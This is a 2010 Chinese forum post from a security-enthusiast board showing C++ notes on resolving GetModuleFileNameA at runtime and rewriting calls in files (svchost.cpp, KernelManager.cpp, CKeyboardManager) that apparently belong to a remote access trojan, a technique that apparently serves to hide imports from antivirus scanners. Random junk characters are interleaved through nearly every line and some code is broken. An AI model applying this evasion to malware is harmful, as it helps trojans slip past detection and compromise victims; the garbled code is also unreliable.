Board logo

标题: [原创文章] 全局动态调用 [打印本页]
作者: ice_xke    时间: 2010-10-19 12:30     标题: 全局动态调用

全局动态调用笔记
3 z4 g* w4 G/ h9 A3 g9 Lsvchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h' S( ?% ~0 q# W; w" ^7 y
----------------------------------------
. H. h- {) ^" q: a- dDTDY.h:7 D3 F1 P+ M7 w! n  C7 D: d! d

+ i, o* t  d& v' @; |; z' Q; \+ [#if _MSC_VER>1000
$ [0 G+ |8 Y( _3 L# O#pragma once9 g& O( E; ?! P6 h" g5 [
#endif //_MSC_VER>1000( h8 ~9 r- G; |7 ^
#include<windows.h>
: x: n8 Y  q5 d( i8 O4 v) ^- ^! z3 i
# H) j( v, D1 x+ S3 @typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
2 S; Q0 c: v' f' B; Dclass DTDY
+ ]1 L6 z+ f" S' \4 d! e{
. O( `, D% G- \+ J' _' Qpublic:- \6 H1 d( i" z+ i# m
DTDY();
1 L9 b  |8 r8 L6 gvirtual ~DTDY();( T6 U" A3 w( g+ @& ^
public:# u6 ]. D$ [- K$ T+ Z3 u' h8 C- X
static pGetModuleFileNameA MyGetModuleFileName;
9 M3 d/ Z0 y  T) [8 u: v5 g$ Nstatic BOOL FunInitiallization();
" c* |) k1 i% z" Y" z0 e, F- ?};5 H$ a, _# [0 R, a
#endif  j  D) F. k, Z4 @9 z
----------------------------------------! P& ^  T8 \" \- L" u3 o1 i: j, q

4 c! T% v* u, y6 {" }$ n9 @8 a7 HDTDY.cpp:$ z/ D- J7 u: b4 n- ?1 E# ]

, R7 F4 A+ u# c! O! r9 [5 ^#include "DTDY.h"
- Q8 E& R9 S: t+ v/ |pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;  _9 g4 {  E/ s+ g) z& ?
DTDY:TDY()- {1 S+ p1 |+ J+ i; {4 ~( r5 A
{
. v3 g1 K6 E5 C& B' S}
3 P) i) X; Q( `& s0 A5 _DTDY::~DTDY()
! ^5 ~- ^- E+ k4 _, u0 a: f- U( h{
8 g& ]6 t# J: }$ H+ u6 n}) b7 m8 f* ?2 p7 v. |( ^* }
BOOL DTDY::FunInitiallization()' A) ]2 I! y/ ~7 w' d
{$ d: d/ e0 {( u& ?/ j) O# u
HMODULE hModule=LoadLibrary("kernel32.dll");
. L" h2 E  _+ [8 U. ^5 K* t8 k  qMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");) n& W0 v) y" M
if(!MyGetModuleFileName=) return FALSE;
3 @, B; i2 @4 U# M% C( P. p2 Q
6 ]6 J5 g! |3 W+ N9 B) ?- mreturn TRUE;! _) f% |. D2 g8 L, C( x2 C1 v
}" ~: R( w5 t. u8 ^+ V2 f
----------------------------------------
. M! I1 J, p6 F, F4 R9 C6 \svchost.cpp:; [; n, S- Z" x% y* @

% U0 R1 G( Z' R/ t3 |#include "DTDY.h"; P: t3 B+ d, c2 i# n

* j9 `+ l7 C! fBOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
9 ?& d5 s+ _$ @8 y& G" m0 E0 W{! v: u' P/ d5 G7 s
switch(ul_reason_for_call)8 ~. K7 p7 J# [: V
{' [5 p8 ?; w. U4 }: ~5 X( l- e
case DLL_PROCESS_ATTACH:
6 x' s* q4 @9 [" jif(!DTDY::FunInitiallization()) return FALSE;9 M8 C- F3 T8 ]) i8 F) R
+ ]) k8 Y' ^1 Q! a3 H6 ?4 j# N
break;7 W3 g2 i1 \5 t
}$ s+ f9 z& x( l  r
}" z/ l# ~! r( _  b  m6 G4 w  x

/ @& R( ^, A7 j9 {. G% }6 ?9 y0 A5 R' T# {. d; }  w2 T/ g
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
  a$ W4 b0 a! Z0 K) u& Y3 }改写为
3 a) Y2 b: l/ o! m9 JDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
. K' ]& o, Q2 x6 W----------------------------------------
# I- d% S1 Z' K' nKernelManager.cpp:; f+ T! Q. [- G
6 H: z6 h- J. _% ]
#include "../DTDY.h"$ d9 ~# R2 t0 p. Z3 G4 z/ y
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));' o1 I! j+ r: E+ ~0 q  v2 P
改写为
) j9 A. Y' b6 T5 B6 ~DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));- n4 m; r9 f# j0 `& s. F
----------------------------------------



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2